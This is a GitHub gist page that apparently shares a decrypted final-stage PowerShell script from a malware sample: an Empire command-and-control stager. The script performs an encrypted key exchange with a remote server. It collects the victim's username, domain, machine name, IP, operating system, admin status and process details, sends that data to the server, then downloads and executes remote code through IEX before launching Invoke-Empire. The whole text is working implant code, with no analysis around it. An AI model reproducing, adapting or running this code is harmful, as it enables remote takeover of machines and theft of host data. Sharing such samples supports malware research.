Skip to content

Instantly share code, notes, and snippets.

@JohnHammond
Created August 19, 2021 18:27
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save JohnHammond/3458bb20734ce07d4ddf548bb86260e2 to your computer and use it in GitHub Desktop.
final_stage_powershell.ps1 after decryption
FunctioN StARt-NEgOTiAte {
PaRaM($s,$SK,$UA='MOZiLlA/5.0 (WiNdOWS NT 10.0; WIN64; X64) APPleWeBKiT/537.36 (KHTML, LIke GEcKo) CHrome/91.0.4472.124 SAFArI/537.36',$hOp)
fUnctiON COnvErTTO-RC4ByTESTReAM {
PArAM ($RCK, $In)
BeGiN {
[BYtE[]] $STR = 0..255;
$J = 0;
0..255 | FOREAch-OBjeCT {
$J = ($J + $StR[$_] + $RCK[$_ % $RCK.LEngTh]) % 256;
$StR[$_], $STR[$J] = $Str[$J], $STr[$_];
};
$I = $J = 0;
}PRocesS {
FoREAcH($BytE iN $In) {
$I = ($I + 1) % 256;
$J = ($J + $Str[$I]) % 256;
$StR[$I], $Str[$J] = $STr[$J], $Str[$I];
$BYTE -bxOr $StR[($Str[$I] + $StR[$J]) % 256];
}
}
}
functiOn DEcRYpt-BYtes {
paraM ($Key, $IN)
IF($IN.LeNgtH -gt 32) {
$HMAC = New-ObJeCt SyStem.SEcurIty.CRYPtogRaPHy.HMACSHA256;
$E=[System.TexT.ENCodinG]::ASCII;
$MAc = $In[-10..-1];
$In = $IN[0..($In.LenGtH - 11)];
$Hmac.KEY = $E.GeTByTES($KEY);
$ExPECTeD = $hmAc.ComPUtEHaSH($IN)[0..9];
if (@(COmPArE-ObJEcT $MaC $EXPECTED -SynC 0).LeNGth -NE 0) {
REtURn;
}
$IV = $In[0..15];
Try {
$AES=NeW-OBJect SySteM.SecuRiTY.CRYPtOGRAphY.AeSCrYptoSERviCeProvIdER;
}CaTCh {
$AES=NeW-ObJecT SYsTEM.SEcuRiTY.CRYPToGrapHY.RijndaelManaGeD;
}
$AES.Mode = "CBC";
$AES.KEY = $E.GEtByTEs($KEY);
$AES.IV = $IV;
($AES.CREaTeDecrYpTOr()).TransformFiNALBlock(($IN[16..$In.LeNGth]), 0, $IN.LeNgtH-16)
}
}
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
$ErrorActionPreference = "SilentlyContinue";
$e=[SYSTEm.TexT.ENCOdING]::UTF8;
$customHeaders = "";
$SKB=$E.GeTByTes($SK);
try {
$AES=NeW-ObJEct SyStEm.SecuriTy.CRypTographY.AESCRYPTOSERVIcEPROViDER;
}CaTCH {
$AES=New-ObJeCt SysTem.SECURItY.CRYptOGRApHy.RijNdAELManaGEd;
}
$IV = [bYte] 0..255 | GeT-RANDoM -CouNt 16;
$AES.Mode="CBC";
$AES.Key=$SKB;
$AES.IV = $IV;
$HMac = NeW-ObJEct SyStEM.SecuriTy.CRYpTOGRAPHy.HMACSHA256;
$hmAc.Key = $SKB;
$CSp = NeW-OBjEct SYSTEM.SecUriTY.CryptOGRAphY.CSpPARamEters;
$cSp.FlAGs = $CSp.FLaGS -bOr [SysTem.SecuRitY.CrYpToGRaPHy.CSpPRoVIDerFlags]::UsEMacHinEKEySTore;
$rS = NeW-ObJEct SysTEm.SeCURItY.CRYpTOGrAPhY.RSACrYPtoServIcEPrOVidEr -ARGuMENTLIST 2048,$csp;
$Rk=$rS.ToXmLStRiNG($FalSe);
$ID=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray()|Get-Random -Count 8);
$IB=$E.gEtbytEs($Rk);
$eb=$IV+$AES.CReATeENCRYPTOR().TraNSfORmFINALBlOCK($Ib,0,$Ib.LENGTh);
$eB=$eB+$HMac.COMPuteHasH($eb)[0..9];
IF(-nOT $WC) {
$wC=NEW-ObJEct SySTem.Net.WebCLIeNt;
$Wc.PROXY = [SYSTEm.NEt.WeBReQuEST]::GeTSYStemWebProxY();
$wC.PRoXY.CrEDENtiaLS = [SYsTem.Net.CrEdenTiAlCacHE]::DeFAUlTCRedeNtiAls;
}
iF ($SCRIpt:PrOxy) {
$wC.PRoXy = $SCrIpT:ProXy;
}
if ($customHeaders -ne "") {
$HEaderS = $cUsToMHeaDERs -SPLIT ',';
$HeaDerS | FOREAcH-ObjEcT {
$hEaDeRKey = $_.SPLIt(':')[0];
$hEaDeRVaLUe = $_.SPLiT(':')[1];
if ($headerKey -eq "host"){
TRY{
$iG=$WC.DOWNLoADDAtA($S)
}caTch{}
};
$wc.HeaDeRs.Add($hEAdErKeY, $heaDeRValue);
}
}
$wc.Headers.Add("User-Agent",$UA);
$IV=[BItCOnVeRTEr]::GetBYTEs($(GeT-RaNdOM));
$DATa = $e.geTBYTEs($ID) + @(0x01,0x02,0X00,0x00) + [BITCONVERTeR]::GetByTES($eB.LenGth);
$rc4p = CoNVERTTO-RC4ByTEStREaM -RCK $($IV+$SKB) -IN $Data;
$rC4P = $IV + $rC4p + $Eb;
$raw=$wc.UploadData($s+"/product.php","POST",$rc4p);
$de=$e.GEtSTRiNG($RS.DEcRypt($rAW,$falSe));
$nonCe=$De[0..15] -JOiN '';
$Key=$dE[16..$DE.LenGTh] -JoIN '';
$noncE=[StRinG]([lOnG]$NOnCE + 1);
tRY {
$AES=NeW-OBJEcT System.SECUrIty.CrYPToGraPhY.AeSCRYpToSErVICePROviDer;
}caTCh {
$AES=NEW-ObJecT SySTem.SEcUrIty.CRYptoGRaphy.RIjnDAElMANAGed;
}
$IV = [Byte] 0..255 | GET-RaNDOm -COUNT 16;
$AES.Mode="CBC";
$AES.Key=$e.GetBYteS($KEy);
$AES.IV = $IV;
$I=$nONce+'|'+$S+'|'+[ENVIrOnMeNT]::USeRDoMainNAME+'|'+[EnvirONMent]::UsERNaME+'|'+[ENViRonmENt]::MACHiNENAmE;
trY{
$P=(gwmI WIn32_NeTworkAdApTeRCoNFiGurAtion|WheRE{ $_.IPAdDrEsS}|SELEcT -ExpAnd IPAddRess);
}CaTCH {
$p = "[FAILED]"
}
$IP = @{
$TRUe=$p[0];
$FaLse=$P
}[$P.LEnGTH -lT 6];
iF(!$ip -or $ip.tRIM() -Eq '') {
$Ip='0.0.0.0'
};
$i+="|$ip";
TrY{
$i+='|'+(GeT-WmIObjeCT WIN32_OPEratiNGSYSTEM).NaME.SplIT('|')[0];
}
CAtch{
$I+='|'+'[FAILED]'
}
if(([Environment]::UserName).ToLower() -eq "system"){
$i+="|True"
}else {
$i += '|' +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
}
$N=[SYsTeM.DiAGnOstICs.PrOCEsS]::GetCURReNTProCEss();
$I+='|'+$n.PRocEssNAMe+'|'+$N.Id;
$i += "|powershell|" + $PSVersionTable.PSVersion.Major;
$Ib2=$e.GETbYTES($I);
$Eb2=$IV+$AES.CReatEEncrYpTor().TranSformFiNAlBLOCk($IB2,0,$iB2.LeNgtH);
$HMAC.KEy = $e.GETByTeS($Key);
$EB2 = $eB2+$HMaC.CoMPuteHAsH($Eb2)[0..9];
$IV2=[BitConVerTeR]::GEtBYtes($(GeT-RanDoM));
$DaTa2 = $E.GeTbyTeS($ID) + @(0x01,0x03,0X00,0x00) + [BitCONverTeR]::GEtBYTES($EB2.LeNGTH);
$rC4P2 = ConVeRtTO-RC4BYTeSTReAM -RCK $($IV2+$SKB) -IN $DAtA2;
$RC4p2 = $IV2 + $RC4P2 + $eb2;
if ($customHeaders -ne "") {
$hEadeRS = $cuStOmHEaDERs -sPliT ',';
$HEadERs | FOREAch-ObjEct {
$HeaDErKEY = $_.SPLit(':')[0];
$HeAderVAlue = $_.sPliT(':')[1];
if ($headerKey -eq "host"){
tRY{
$ig=$WC.DOwNloAdDAta($s)
}CATCH{}
};
$Wc.HEaDeRS.Add($HeadErKEy, $HEadERValUE);
}
}
$wc.Headers.Add("User-Agent",$UA);
$wc.Headers.Add("Hop-Name",$hop);
$raw=$wc.UploadData($s+"/product/get.php","POST",$rc4p2);
IEX $( $e.GETSTRiNG($(DecrypT-ByTEs -Key $KeY -IN $RaW)) );
$AES=$nULl;
$s2=$NuLL;
$wc=$nULL;
$eb2=$Null;
$rAW=$nULl;
$IV=$NuLL;
$Wc=$NuLl;
$i=$NUll;
$ib2=$nuLl;
[GC]::CollEcT();
Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy;
}
Start-Negotiate -s "$ser" -SK 'o=^@H*v#qh(jNBt%X]MpTbQZ&[_-.)J?' -UA $u -hop "$hop"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment